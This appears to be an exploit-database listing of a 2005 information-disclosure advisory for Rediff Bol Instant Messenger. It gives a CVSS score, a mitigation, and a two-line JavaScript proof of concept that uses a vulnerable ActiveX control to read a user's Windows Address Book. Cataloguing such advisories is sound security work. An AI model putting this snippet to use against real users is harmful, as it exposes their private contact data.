header-logo
Suggest Exploit
vendor:
Instant Messenger
by:
SecurityFocus
7.5
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: Instant Messenger
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2005

Rediff Bol Instant Messenger Information Disclosure Vulnerability

A malicious ActiveX control could allow an attacker to obtain the contents of a vulnerable user's Windows Address Book.

Mitigation:

Disable ActiveX controls or restrict access to trusted sites.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14740/info

Rediff Bol Instant Messenger is prone to an information disclosure vulnerability. A malicious ActiveX control could allow an attacker to obtain the contents of a vulnerable user's Windows Address Book. 

[script]
var Obj = new ActiveXObject("Fetch.FetchContact.1");
alert(Obj.FullAddressBook(0,"","",""));
[/script]

Navigation

Suggest Exploit

Services By CQR